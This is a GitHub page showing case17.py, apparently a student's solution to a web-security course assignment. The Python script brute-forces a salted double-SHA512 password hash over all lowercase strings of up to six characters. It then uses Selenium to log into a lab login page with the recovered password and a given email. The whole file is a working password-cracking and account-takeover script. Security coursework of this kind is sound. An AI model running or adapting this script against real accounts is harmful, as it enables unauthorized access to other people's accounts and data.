-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcase17.py
54 lines (42 loc) · 1.68 KB
/
case17.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# Password lowercase and at most 6 chars.
# Lets try to brute force.
import sys
import itertools
import hashlib
import string
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
MAX_ATTEMPTS = 308915776 # 26^6
salt = sys.argv[1]
password = sys.argv[2]
def get_hashed_password(plaintext):
# Password is hashed twice - once on client and once on server
return hashlib.sha512(hashlib.sha512(plaintext).hexdigest() + salt).hexdigest()
def bruteforce(charset, maxlength):
return (''.join(candidate)
for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
for i in range(1, maxlength + 1)))
count = 0
actual_pw = ''
for attempt in bruteforce(string.ascii_lowercase, 6):
count += 1
percentage_completion = float(count)/MAX_ATTEMPTS*100
if count % 50000 == 0:
print 'Brute force progress: {}%'.format(percentage_completion)
if get_hashed_password(attempt) == password:
actual_pw = attempt
print 'Actual plaintext password is: {}'.format(attempt)
break
print 'logging in'
driver = webdriver.Firefox()
driver.get('http://www.wsb.com/Assignment2/case17/login.php')
def find_by_xpath(locator):
element = WebDriverWait(driver, 10).until(
EC.presence_of_element_located((By.XPATH, locator))
)
return element
find_by_xpath('//input[@name = "email"]').send_keys('[email protected]')
find_by_xpath('//input[@name = "password"]').send_keys(actual_pw)
find_by_xpath('//input[@type = "button"]').click()